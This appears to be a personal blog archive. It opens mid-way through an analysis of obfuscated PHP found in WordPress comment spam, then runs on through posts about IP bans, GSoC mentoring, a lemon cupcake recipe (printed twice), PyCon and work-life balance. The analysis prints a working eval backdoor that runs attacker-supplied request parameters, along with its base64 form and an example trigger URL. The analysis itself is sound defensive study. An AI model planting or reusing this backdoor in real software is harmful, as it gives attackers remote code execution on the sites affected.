Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzLyo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAzenUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=


You might think we're getting close now, but here's what you get out of decoding that:


>>> base64.b64decode(badstring1a)
"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*PH49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=<D`*/'z'/*xgg1v61*/./*VpIg4*/'y'/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*//*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/eval/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*<Hg3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(21d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'zyl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*//*bX<*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*/"


Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.

Incidentally, I'm just using a simple regular expression to do this: s/\/\*[^*]*\*\///g. That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as :%s/\/\*[^*]*\*\///gc and then check each piece as I'm removing it.

Here's what it looks like without the comments:


if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l']))eval(stripslashes($_REQUEST['c'.'z'.'l'.'zyl']));


So let's stick together those concatenated strings again:


if(isset($_REQUEST['czlzyl']))eval(stripslashes($_REQUEST['czlzyl']));



Okay, so now it's added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed. That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request. Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once once the machines are prepared?

It's going to go to be a request that starts like this http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=

Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I can tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.

But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by akismet) and that if you can turn off javascript while you're moderating comments, that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying. Thankfully it doesn't render it unusable!

Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!

comments

I maintain a couple of blogs outside of this one, and the most popular one I'm involved with gets a lot of spam. There seemed to be a particular uptick about a month back, and I went to look into it.

What I discovered is that quite a lot of our spam (around 80%) was coming from one company called IPTelligent LLC. There's no easy way for me to tell if they are a legit company who simply have the worst IT staff in the history of IT staffs and all of their machines are compromised, or if they are, in fact, evil jerks who are repeatedly attempting to pollute the internet with really terrible spam. Given a short websearch, it seems pretty likely that IPTelligent is intentionally evil. I suppose one could argue that the level of incompetence displayed by someone who not only runs that many compromised machines but also serves up malware consistently is a form of evil even if it wasn't intentional. Whatever.

Either way, they are responsible for a rather large percentage of the spam we were receiving, and not responsible for any legit visits that we could see.

Since this particular blog uses Wordpress, solving the problem was pretty simple. Wordpress has built in lists for blocking comments, but they simply send to the moderation queue, as does popular plugin Akismet. Since we were seeing hundreds of messages per day from IPTelligent, I needed something that banned them more completely so our moderators wouldn't even see the messages and have to scan through them. Thankfully, there are lots of plugins for this. I settled on one called wp-ban that seems to be working well for my needs.

Once that's installed, the settings are under Settings->Ban. At the top of my list, I now have

# IPTelligent owns these ips, and they seem to be a spam company
96.47.225.*
173.44.37.*
96.47.224.*

Which covers the majority of the IP that were hitting us with spam. A glance at a more specific list of IPTelligent IPs suggests that those lines are good enough right now, although it's possible that they'll buy more IP blocks eventually. (We also have a longer list of other ips that appear to be compromised and were causing problems, but they look more like temporary compromises than intentional, long-term malice so I'm not listing those IPs here).

Of course, it would be better if someone took the company to court for this. I am not a lawyer, but it seems to me that the Computer Fraud and Abuse Act must cover at least some portion of their activities. I mean, the things they charged Aaron Swartz with under that act seem less sketchy than what IPTelligent is doing. But court cases take time and money, and banning them right now is pretty easy, so I figured I'd share the short-term solution in case it's useful to anyone who'd like to get a little less spam right away. (We are indeed getting ~80% less spam since the bans went into place.)

For the record, here's the company info as I get from the whois database right now:

OrgName:        IPTelligent LLC
OrgId:          IPTEL-1
Address:        2115 NW 22nd Street
Address:        #C110
City:           Miami
StateProv:      FL
PostalCode:     33142
Country:        US
RegDate:        2009-03-31
Updated:        2012-07-16
Ref:            http://whois.arin.net/rest/org/IPTEL-1

ReferralServer: rwhois://rwhois.iptelligent.com:4321

OrgNOCHandle: NOC3572-ARIN
OrgNOCName:   Network Operations Center
OrgNOCPhone:  +1-888-638-5893
OrgNOCEmail:  sysop@iptelligent.com
OrgNOCRef:    http://whois.arin.net/rest/poc/NOC3572-ARIN

comments

First some me-related updates:

• I got to help staff a table at roborave on Saturday. fun! I was too busy to take pictures, so don't ask.


• GSoC ranking continues apace. It's actually less busy for me than it was, since I don't need to interact with the students as much until selection is finished, so I've gone from over a hundred people potentially wanting to talk to me to something closer to 20-30. (project admins + mentors with melange trouble). I expect there'll be some wrangling to make sure the Systers and Mailman don't have any overlapping project ideas, but that can wait a few days.


• To save people from asking me: I'm not expecting to hear about the Portland job for another couple of weeks. This is actually pretty convenient for me since it means I can focus on GSoC during the selection period; horray for good timing!

And then some links that amused me:

• Check out this awesome quote from the guy who introduced Sriracha sauce to the west.. Just scroll down; it's been helpfully put into the picture of Mr. David Tran. But the article itself is pretty interesting too.
  
  
• You may have seen the link going around claiming that the Miss Korea contestants all look like clones. I chalked it up to some sort of racist "all Korean people look the same" nonsense, but this analysis of why they all look the same is pretty interesting. Short answer: makeup and photoshop by pageant folk. (Although I bet there's some racism involved in the spread of the link too.)
  
  
• "Ship just got real." This is the most compelling smooth-jazz voiceover in a trailer for a turn-based boat game that you're going to see today. At least until you watch the second one, which has even more boat puns. J tells me that the game is actually pretty fun even though he only bought it because the trailer was hilarious.
  
  
• Ever wanted to know if your interface is being messed with by a monkey? Android has you covered with isUserAMonkey().
  
  
• Also, there exists a set of log.wtf functions in Android. Handy!
  
  
  

comments

There's a longer, friends-locked post before this one talking about the interviews I had this week, but it occurs to me that the more general public might get a kick out of the two interview questions that most amused me:

My new favourite interview question:

Given this code...

if ( X ) 
  print("hello")
else 
  print("world")

What do you need to insert in place of X in order to get this code to print "helloworld" ?



And the second one:


If you're in a room with a light bulb that's on, how can you make it be off?


(This was asked shortly after they told me they were asking to see if I had the security mindset, which is a pretty huge clue as to the types of answers they were hoping to hear. I had a lot of fun with this.)


I am leaving my answers out of this post so that you can think about the possibilities yourselves, but of course feel free to discuss in the comments.

comments

I know geeks are stereotypically supposed to love drooling over new technology and comparing specs and stuff, but that's never really been my scene. There are things I care about enough to do research on, things I have particular requirements for that I want to meet, and then there's everything else. I don't want to buy/download/use crap, and I don't want to read breathless review after breathless review.

So I was really excited to hear about The Wirecutter, which purports to just list off the best thing (with a few alternatives) in various classes of things.

It's interesting, too, that it's got stuff like the big wait sign on this page right now which tells you that new stuff is coming so if you're not desperate, you might as well wait 'till they've been able to review the new things. Makes me feel a lot more reassured about the freshness of their information.

Used it for the first time yesterday to replace my defective point-and-shoot camera (which is a longer story, but one I'm not telling today) and it was fantastic to spend so little time making a decision. We'll see how it works out long run, but it's already saved me hours of my life and I came away feeling pretty close to as informed as I do after reading All The Reviews. Win!

comments

So, after I threatened to make this my new form letter (FYI: I haven't, but I do cut and paste from it to make shorter, more personal answers) the first email I see from a student is, again, personally to me, but... he was totally doing it right. Posted to the mailing list, waited a bit for a response, checked to see who was talking about this idea last, saw it was me, then pinged me to ask if I'd seen the posts (which he linked to make it easier for me) and asked if I could help answer his questions.

I am so pleased. :)

And now, I'd best stop talking about how lovely the email is and get on to that part where I either answer him or deflect to a mentor who isn't quite so overwhelmed this weekend... Did I mention I'm going out of town tomorrow?

comments

In case anyone was worried, no, I haven't actually started sending out form letters, but I am using this as a template I can cut & paste from for shorter, more personal emails to students.

Dear prospective student,

I've been getting a *lot* of personal emails/irc queries/IM messages since I took over as the organizational administrator for the Python Software Foundation. It's pretty neat because I'm really thrilled to see so many people excited about Google Summer of Code, but mostly, you shouldn't be contacting me directly.

If you're interested in one of the Python projects:

Take a look at the list of organizations running projects under the PSF:
http://wiki.python.org/moin/SummerOfCode/2013

Each one has a mailing list and sometimes an IRC channel associated with it. That is where you should be introducing yourself and asking questions.

If you are not sure who to contact for any reason, you should be asking on the soc2013-general mailing list. You can subscribe to this here:
http://mail.python.org/mailman/listinfo/soc2013-general/

If you're emailing me with regard to Systers and not a project under the Python Software Foundation, the same things apply only the relevant list is systers-dev, available here:
http://systers.org/mailman/listinfo/systers-dev


Why shouldn't you email me?

1. If you email the lists, lots of mentors from around the world will see your question. If I'm asleep or at work, they'll probably be able to answer it faster than I can.
2. If you email the lists and the person answering you answers on the list, it can benefit all the people who might have a similar question.
3. Chances are, I'm not going to be the mentor for your project, so there is someone out there who can answer your question better than I can.


Thanks very much, and good luck in your GSoC applications!

Terri

comments

This is crossposted from Curiousity.ca, my personal maker blog. If you want to link to this post, please use the original link since the formatting there is usually better.

I helpfully told my friend Adric that these cupcakes were my way of doing human testing without requiring IRB approval. Remember kiddies, experimental cupcakes are only one step away from mad science because my guinea pigs generally consent to the experiment!

Lemon Googe Cupcakes

These come in three parts; some assembly required. I made up the recipe as a whole based on my recollection and modification of recipes in my head / recipe card box, with some inspiration from the filled cupcakes in Vegan Cupcakes Take Over the World (although this is not a vegan recipe).

Lemon Cupcake

1/4 C (4 tbsp) butter

3/4 C sugar (1/2C is probably ok for this recipe if you want to cut back)

1 egg

1 tsp vanilla

Zest from one lemon

1/2 C milk

1 tsp baking powder

1 C flour

Cream butter and sugar together; add egg, vanilla, lemon zest and milk and stir well.

Add baking powder and flour and stir until smooth (but no longer).

Spoon into cupcake liners (or I use silicone molds), filling about halfway.

We made 16 cupcakes, you might want to fill a bit higher to get 12.

Bake at 350F for 20-25 minutes (10-15 min for mini cupcakes)

Lemon Googe Filling

The name comes via my Ottawa friends: for some reason we decided that “googe” best described the texture of those little gel cup sweets that are considered to be a choking hazard in the US. This nomenclature would probably have died out, but one of my friends was severely grossed out by the word, so we have used it to describe anything of a given gooey texture ever since.

You’ll note that this is more or less a lemon pie filling recipe, omitting the egg, or a slightly gooey lemon pudding.

1/4 C cornstarch

1/2 C cold water

1 C hot water (Or less if you want thicker googe)

Juice from one lemon

3/4 C icing sugar (or adjust this to taste)

~3 drops of yellow food colouring

Mix together cornstarch and cold water, then add mixture to hot water along with lemon juice and sugar and stir well. Heat in microwave repeatedly (around 30-45s per time), stirring after each heating, until mixture is thick and no taste of cornstarch remains. You can probably nuke it longer between stirrings, but if it boils once it’s thicker it might splatter all over your microwave, so keep an eye on it. Add food colouring, because normal lemon pie filling gets its colour from egg yolk and you want people to immediately think “lemon” and not “what the heck?” as they might have if you had allowed your lovely assistant to use the blue colouring like he wanted.

If you are making mini cupcakes or just don’t plan to lose as much to taste-testing for the sugar, you can probably halve the googe recipe. Or you can allow people to dip the cupcakes in the remaining googe like some sort of weird fondue; I don’t judge.

You can add sugar after the fact if you think it needs more — it’ll dissolve, and no one minds getting a blob of icing sugar. You can’t do this with the cornstarch, though.

Cream Cheese Icing

4 oz regular cream cheese (half a package usually. Don’t use the spreadable stuff.)

1/4 C butter

1 tsp vanilla

Around 2 C icing sugar (or however much it takes until the consistency is correct)

I suspect you’re supposed to plan ahead for this and soften the butter and cream cheese in advance, but what I do is nuke those suckers together ’till they’re practically liquid and easy to stir (around 1 min), then add vanilla and sugar ’till it’s a slightly goopy icing consistency, and let it firm up as it cools. This strategy actually does make it easier to deal with the final icing in this case, since it’s easier to spread when a bit more liquid-y, but your mileage may vary.

You could probably put some lemon in here too, but at this point that seems like overkill.

Assembly instructions

Get an icing bag with a metal or plastic tip (sorry, this is one time that cutting the corner off a plastic bag probably isn’t enough). We’ll be using this to fill the cupcakes with lemon googe.

I chose a slightly too big tip, so my googe was spilling everywhere, and the lazy “I’m not sticking my hand in there to get a new tip because our kitchen sink broke this morning” solution was:

1. Stab the icing tip into the cupcake.

2. Spoon a tablespoon or so of googe into the bag.

3. Squeeze the googe into the cupcake, trying not to go right through to the bottom

Repeat, doing 1 more quickly subsequent times because you are dripping sticky slime all over the counter.

Yeay!

I had my lovely assistant do this part so it wasn’t bad for me at all, but you might want to save yourself the trouble and not use the largest icing tip you have on hand.

You now have a cupcake with a gooey hole in it. I will refrain from juvenile jokes, but this may be the point where you’ll be really glad you used the food colouring so your lovely assistant will not think of juvenile jokes.

Cover your googe-filled cupcakes with cream cheese icing. This will be challenging because you’re basically holding a lubricated cupcake and the icing will slide off the hole in the center. Having experimented with this, I can tell you that it is easiest to ice the outside and then cover the googe last. It’s also fun to slime the top of the cupcake and layer the icing on that, which will add extra lemony goodness but is also really messy.

The Lemon Googe Cupcake Experiments

Hypothesis: lemon googe, if inserted into the cupcake 24h+ in advance, will suffuse the cupcake making it more delicious.

Method:

16 cupcakes were created in the initial batch.

2 were assembled and eaten immediately and declared delicious by both experimental subjects J and T.

The remaining cupcakes have been divided into two groups. One has been filled with googe and iced and placed in the fridge to age for 24h. After the time has elapsed, two prepared cupcakes will be removed from refrigeration and eaten by experimental subjects J and T. If they are deemed an improvement over the freshly assembled cupcakes, the rest of the batch will be prepared in a similar manner. After 48h have passed, experimental subjects will be able to compare 0-day cupcakes, 24h cupcakes, and 48h cupcakes. If the prepared cupcakes are deemed unsuitable at 24h (likely due to structural integrity failures), then the control batch will be left untouched until shortly before the 2600 meeting which will represent our larger clinical cupcake trial. This will not be a double-blinded experiment, although one could be conducted at a later date to more comprehensively test cupcake saturation over time.

Hypothesis 2: 400ml is way to much googe

Method: 400ml of googe solution has been prepared and will be inserted into cupcakes as described above. If the cupcakes cannot hold this amount of googe, the remainder will be given to the experimental subjects for consumption or further experimentation. We will report back on crowdsourced solutions for too much googe after the clinical trials are complete.

Cupcake Clinical Trial

If you wish to participate in this clinical cupcake trial, please attend the 2600 meeting at Quelab on Friday April 5, 2013. Please note that I have not obtained ethics approval for this experiment and you will be participating at your own risk.

comments

I helpfully told my friend Adric that these cupcakes were my way of doing human testing without requiring IRB approval. Remember kiddies, experimental cupcakes are only one step away from mad science because my guinea pigs generally consent to the experiment!

Lemon Googe Cupcakes

These come in three parts; some assembly required. I made up the recipe as a whole based on my recollection and modification of recipes in my head / recipe card box, with some inspiration from the filled cupcakes in Vegan Cupcakes Take Over the World (although this is not a vegan recipe).

Lemon Cupcake

1/4 C (4 tbsp) butter

3/4 C sugar (1/2C is probably ok for this recipe if you want to cut back)

1 egg

1 tsp vanilla

Zest from one lemon

1/2 C milk

1 tsp baking powder

1 C flour

Cream butter and sugar together; add egg, vanilla, lemon zest and milk and stir well.

Add baking powder and flour and stir until smooth (but no longer).

Spoon into cupcake liners (or I use silicone molds), filling about halfway.

We made 16 cupcakes, you might want to fill a bit higher to get 12.

Bake at 350F for 20-25 minutes (10-15 min for mini cupcakes)

Lemon Googe Filling

The name comes via my Ottawa friends: for some reason we decided that “googe” best described the texture of those little gel cup sweets that are considered to be a choking hazard in the US. This nomenclature would probably have died out, but one of my friends was severely grossed out by the word, so we have used it to describe anything of a given gooey texture ever since.

You’ll note that this is more or less a lemon pie filling recipe, omitting the egg, or a slightly gooey lemon pudding.

1/4 C cornstarch

1/2 C cold water

1 C hot water (Or less if you want thicker googe)

Juice from one lemon

3/4 C icing sugar (or adjust this to taste)

~3 drops of yellow food colouring

Mix together cornstarch and cold water, then add mixture to hot water along with lemon juice and sugar. Heat in microwave repeatedly (around 30-45s per time), stirring after each heating, until mixture is thick and no taste of cornstarch remains. Add food colouring, because normal lemon pie filling gets its colour from egg yolk and you want people to immediately think “lemon” and not “what the heck?” as they might have if you had allowed your lovely assistant to use the blue colouring like he wanted.

If you are making mini cupcakes or just don’t plan to lose as much to taste-testing for the sugar, you can probably halve the googe recipe. Or you can allow people to dip the cupcakes in the remaining googe like some sort of weird fondue; I don’t judge.

You can add sugar after the fact if you think it needs more — it’ll dissolve, and no one minds getting a blob of icing sugar. You can’t do this with the cornstarch, though.

Cream Cheese Icing

4 oz regular cream cheese (half a package usually. Don’t use the spreadable stuff.)

1/4 C butter

1 tsp vanilla

Around 2 C icing sugar (or however much it takes until the consistency is correct)

I suspect you’re supposed to plan ahead for this and soften the butter and cream cheese in advance, but what I do is nuke those suckers together ’till they’re practically liquid and easy to stir (around 1 min), then add vanilla and sugar ’till it’s a slightly goopy icing consistency, and let it firm up as it cools. This strategy actually does make it easier to deal with the final icing in this case, since it’s easier to spread when a bit more liquid-y, but your mileage may vary.

You could probably put some lemon in here too, but at this point that seems like overkill.

Assembly instructions

Get an icing bag with a metal or plastic tip (sorry, this is one time that cutting the corner off a plastic bag probably isn’t enough). We’ll be using this to fill the cupcakes with lemon googe.

I chose a slightly too big tip, so my googe was spilling everywhere, and the lazy “I’m not sticking my hand in there to get a new tip because our kitchen sink broke this morning” solution was:

1. Stab the icing tip into the cupcake.

2. Spoon a tablespoon or so of googe into the bag.

3. Squeeze the googe into the cupcake, trying not to go right through to the bottom

Repeat, doing 1 more quickly subsequent times because you are dripping sticky slime all over the counter.

Yeay!

I had my lovely assistant do this part so it wasn’t bad for me at all, but you might want to save yourself the trouble and not use the largest icing tip you have on hand.

You now have a cupcake with a gooey hole in it. I will refrain from juvenile jokes, but this may be the point where you’ll be really glad you used the food colouring so your lovely assistant will not think of juvenile jokes.

Cover your googe-filled cupcakes with cream cheese icing. This will be challenging because you’re basically holding a lubricated cupcake and the icing will slide off the hole in the center. Having experimented with this, I can tell you that it is easiest to ice the outside and then cover the googe last. It’s also fun to slime the top of the cupcake and layer the icing on that, which will add extra lemony goodness but is also really messy.

The Lemon Googe Cupcake Experiments

Hypothesis: lemon googe, if inserted into the cupcake 24h+ in advance, will suffuse the cupcake making it more delicious.

Method:

16 cupcakes were created in the initial batch.

2 were assembled and eaten immediately and declared delicious by both experimental subjects J and T.

The remaining cupcakes have been divided into two groups. One has been filled with googe and iced and placed in the fridge to age for 24h. After the time has elapsed, two prepared cupcakes will be removed from refrigeration and eaten by experimental subjects J and T. If they are deemed an improvement over the freshly assembled cupcakes, the rest of the batch will be prepared in a similar manner. After 48h have passed, experimental subjects will be able to compare 0-day cupcakes, 24h cupcakes, and 48h cupcakes. If the prepared cupcakes are deemed unsuitable at 24h (likely due to structural integrity failures), then the control batch will be left untouched until shortly before the 2600 meeting which will represent our larger clinical cupcake trial. This will not be a double-blinded experiment, although one could be conducted at a later date to more comprehensively test cupcake saturation over time.

Hypothesis 2: 400ml is way to much googe

Method: 400ml of googe solution has been prepared and will be inserted into cupcakes as described above. If the cupcakes cannot hold this amount of googe, the remainder will be given to the experimental subjects for consumption or further experimentation. We will report back on crowdsourced solutions for too much googe after the clinical trials are complete.

Cupcake Clinical Trial

If you wish to participate in this clinical cupcake trial, please attend the 2600 meeting at Quelab on Friday April 5, 2013. Please note that I have not obtained ethics approval for this experiment and you will be participating at your own risk.

comments

I should write up a proper trip report with pictures and stuff, but as it's nearly midnight and I don't want my sleeping patterns to stay on California time, you get some short highlights:

1. The conference itself was awesome. Recall: I attended the sprints last year but not the main conference, so while I had high hopes I didn't know that the content would be so good. I attended a lot of great talks and no doubt missed quite a few as well. I'll be making heavy use of the conference recordings over the next little while, I expect.

2. I am really excited about my free raspberry pi. While I know lots of folk who frequently get given cool toys and told to go hack them, this is the first time someone has gifted me with such an item/mission, and it feels great. I haven't figured out what I'm going to do yet, but there was this great talk about hooking one up to a $300 CNC machine, and another great one about home automation that could be useful...

3. The sprints were super-productive! You can see our todo/completed/waiting list here if you want the nitty gritty. I'd been joking earlier to anyone who asked that we were totally going to release by Friday, and while we didn't do that, we *are* very close and you should all expect a beta release of postorius + Mailman 3 very soon. I can't wait to show it off!

4. Perhaps later I'll do up the stats on exactly what I was doing to our repository, but I should tell you that not only did I make plenty of my own code commits, but I also got to merge code from new contributors. This was totally my favourite part, seeing new folk get their code accepted and in the main tree. And it wasn't just the people who were physically at the sprints with us: I also merged code from people contributing remotely, most of whom are prospective GSoC students. Way to impress me, students!

5. I got to talk to a bunch of people about GSoC. I do this all the time by email, but it was especially fun to talk to folk in person about what's involved, why it's awesome, how to be good at it, and why they should sign up.

6. And post-con, I got a few days to catch up with friends in the area and visit the Japanese Tea Gardens in Golden Gate Park, which I've wanted to do ever since I read Seanan Mcguire's October Daye books. As I processed a few photos for this week's assignment, you get one here:



And with that, midnight has rung and it's bedtime. I have a long week of catch-up ahead of me at work, but expect some more pycon / mailman / gsoc posts out of me over the next little while as I internalize all the things I've been thinking about this past week.

comments

There’s a remarkable amount of discussion going on, just now, of Sheryl Sandberg’s new book, Lean In: Women, Work, and the Will to Lead.  Sandberg is COO of Facebook.  Her book attempts to explain why women have stalled out in their march on the executive suite and “offers compelling, commonsense solutions that can empower women to achieve their full potential.”

Bah.

In this discussion, I’m much closer to the view of Jody Greenstone Miller.  Miller is the author of a recent Wall Street Journal piece:  The Real Women’s Issue: Time — Never mind ‘leaning in.’ To get more working women into senior roles, companies need to rethink the clock.  She correctly, in my opinion, points out that many great women don’t lack the skills or aggression to advance in large corporations.  They ‘stall out’ or bail out, rather than “‘lean in’ because they don’t like the world they’re being asked to lean into.”

Amen — but . . .

But even Miller is missing the boat somewhat when she frames this discussion as primarily a gender issue.  Women working for large corporations may have lead the charge on big-corporate work values for a few decades but they are hardly alone any more.  That movement has become much deeper and more pervasive.

Why isn’t anyone talking about the fact that the same ‘problems’ that have impeded women in some workplaces for the last few decades are exactly the same ‘challenges’ that Gen-X and Gen-Y employees of both genders are presenting to employers?  

Women may have been the most noticeable class of workers to demand the right to a life outside their corporate identities in years past but it’s hardly a gender-specific demand any more.  Today’s workers, female AND male, younger AND older, know and feel free to express that it is truly just not worth it to sell your soul to the company store.  Jobs don’t last.  Heck, companies don’t even last.  Loyalty to a specific employer HAS to be tempered these days with a realistic eye on fall-back plans and other opportunities that might come up.  But this change isn’t just about job security or the lack of it, this change is about values and motivation.

Employers, all employers, but especially those large, hard-charging corporations that Ms Sandberg thinks more women should be leaning into, need to recognize the fact that the employment they offer is now pervasively seen as “the day job” — the gig you do to make possible whatever is REALLY important to you.  Isn’t that the easiest way to reconcile the traits that HR folks tell us Gen-Xers and Gen-Yers and, oh, by the way, older workers now, too, have in common?:  an independence that is often interpreted as flightiness, a need for flexibility in both schedules and responsibilities that can be used to carve out a very personal work/life balance, and — paradoxically, in the traditional view — a demand for meaningful, challenging work.

Maybe this is easier for me to see because I’ve made this trade-off longer and more consciously than a lot of people, albeit for a different reason.  Yes, I’m female but, frankly, leaning in and working long hours have never been issues for me.  (Those stories will have to wait for another post; for now, just trust me on this one, when it comes to long hours and asserting myself in discussions,  I’m certifiable.)

For me the trade-off was always about location.  In order to live where I wanted and with whom, I’ve bypassed a lot of opportunities.  It never occurred to me that this wasn’t a big trade-off or that it wouldn’t/shouldn’t cost me money and opportunities for rank and advancement.  And I have not always executed the trade-off gracefully.  My very first job out of college was with General Electric.  I had jumped through all the corporate recruiting hoops senior year to get the job.  GE did everything they could to attract me and make me welcome:  a top salary, an exciting career trajectory via a new corporate initiative, introductions to other young workers including helping me find temporary housing with some of the nicest people I’ve ever met.  My manager even postponed my start date for 60 days after graduation so I could spend some time at home ‘one last time.’  I quit after two weeks.  Sigh. I’m not proud of it.  That’s not just ‘flighty’, it is the corporate equivalent of jilting your intended at the altar.  And it still haunts me in the occasional dark hour.  But how could I really know, till I got there, that I simply wasn’t willing to live anywhere in or near Bridgeport, Connecticut?  (No offense intended, current Bridgeportians — it was a personal thing for a kid who grew up in Montana, not a value judgement on your town.)

In the 35 years since then, I’ve moved around, living in Montana, New Hampshire, Oregon (on the coast, not Portland), New Hampshire again, Vermont, and now Wyoming.   And I’ve done some good work, if I do say so myself.  Worked for large companies and small, as an employee and a free-lancer.  Been the co-founder of a small technology start-up that established a new software market niche, employed 200+ people at one point, and, after 15 years, sold itself to a big company where, as far as I know, our software lives on.  Got to travel to New York City, regularly for a time, living a couple of days a week in a company apartment and soaking in one version of city life.  Made sales calls and worked trade shows in a lot of big U.S. cities.  Gone on marketing tours in Europe.  And, most memorably, got to hire and work with extraordinary people.

On reflection, I actually think I worked too many hours and leaned in at my co-workers a little too much for a lot of those years.  But I had a life, too.  With my husband, we have lived where we wanted, raised a family, gotten outdoors, and had adventures — although never enough, so we’re not done yet.

But now I’m on the other end of the stick. I’ve got a start-up of my own and I’m trying to attract employees.  And I have to deal with the fact that my start-up, my dream business, is my new employees’ day job.  This is a critical issue for me to address.

You’d think that, when trying to do a software startup in rural Wyoming, that just finding people qualified to do particular jobs would be the hard part.  And it sure is challenging.  But the fact is, great people live everywhere and almost all rural areas have long had a substantial segment of under-employed folks — people with the skills to live and work anywhere who, instead, live and work exactly where they choose.  They are needles in a huge haystack but, given that I don’t care if they are local or remote, I’m pretty sure that, over time, I can find people with the skills I need.

My bigger problem is that, just like any old MegaCorp these days, I have to face the fact that the job I offer is a “just the day job” and that the best people I can find will almost always already have a more important gig of their own.  It might be raising a family or finishing college or playing in a band or environmental activism or even ‘just’ wanting time to get outdoors a lot to ski or hike or hunt.  I have to find a way to reel them in, nurture their interest in the work I want them to do, and help them figure out a long-term fit between the work we share and their own priorities.

The upside is that these folks, when I do find them, are mostly already entrepreneurs.  Their real gig, whatever it is, probably demands they wear a lot of hats.  They are likely to know a lot more about marketing and about running a business than traditional job seekers used to know.  And they surely know a lot about trade-offs and flexibility and life/work changing out from under you in unpredictable ways.

So I believe I can make this work eventually, even I’m not getting it just right just yet.  I lost a good resource recently.  I thought my long term risk was that I was not giving her enough hours.  I thought she needed enough work  so she would feel comfortable turning down an upcoming seasonal job she wanted to avoid taking this year  So I kept coming up with more projects for her to do.  She seemed interested and enthusiastic and invested, even, in the outcomes.  Then she quit.  And hard as I tried to understand the little she would share with me about why, I’m still confused.  As far as I can tell, I crossed some sort of line and started sucking too much time and attention away from her own projects.  Leaning in a bit too far again, sigh.  (See why I don’t think that’s the answer?)

But one thing I do know:  this trade-off between work and life is no longer a woman’s issue or even an employee’s issue.  It’s an employer’s issue.  I don’t care what the overall job market is like.  The competition for the very best people is always going to be fierce and if we employers want great people to work for us and stay, WE have to help them find ways to make the day job fit the life, not the other way around.

I'm not leaving yet, but it's just becoming increasingly hard to think about anything else. Which is really unfortunate, because my deal to myself was that I'd work this week (which is spring break at UNM) in exchange for taking next week off for hacking.

So, uh, yeah, back to work now. :)

comments

We have two days left until the end of the ‘game idea’ contest we have been running over on Learning-Laboratory.com.  I’ve always figured that we would get the bulk of our entries, if any, in the last two days so I’m eager to see what rolls in by Friday.

For now, let me just say that, if you know a chem student with even half an idea for a game, you should tell him or her that the odds of any valid entry winning something are, well, quite good.

But why run a contest in the first place?  We’re in this business to make money not to give it away.  So what, specifically, was the contest intended to accomplish?  And how do we know, when we are done, if the project has been a success?  What are we trying accomplish?

1. The contest is a first and foremost a minimum viable product (MVP).  Although we aren’t charging money for it (in fact, we’re promising to give money to the winners), we have been asking instructors and students to spend time on it, an equally valuable although a lot less quantifiable commodity.  This MVP test of the learning game contest cuts two ways:
   1. Does the idea of ‘learning games’ resonate with students?  If we get a reasonable number of entries, we will have some evidence that students  dissatisfied with their current drill/study methods and think that online games and activities would be a nice alternative.
   2. Does it resonate with instructors?  We’ve asked instructors to pin up our poster and/or post a link to the game for students to follow.
2. The contest is intended to help us build our mailing lists and, again, there are two of these:  instructors and students.
3. Search Engine Optimization (SEO).  The white hat approach to SEO is to build great content and then seek legitimate links.  Ashley and Bret have been generating that great content for the last 6+ months; the contest is a way to generate more links.
4. Give me some talking points as I do phone and face-to-face interviews.  The contest experience, any entries we get, the sample entry we produced, and our simple implementation of it (Sig Fig Rules!) combine to give me a basis for doing face-to-face and phone interviews with instructors as we go forward.
5. Build our internal WordPress, Google Analytics, SEO, and other marketing skills. Nothing makes one a more effective writer, poster, analyst, strategist than doing each of those things, observing the results, and thinking about how to do them better next time.

I’ll report on how well this all actually worked after the contest, judging, and awarding are over.

It's been a while since I just wrote about what I'm doing, so let me tell you about some of this week:



On Wednesday I...

... continued to run cool experiments on mutated software at work.
... went to see Cory Doctorow speak at the library.
... went out for falafel with some local hacklab folk.
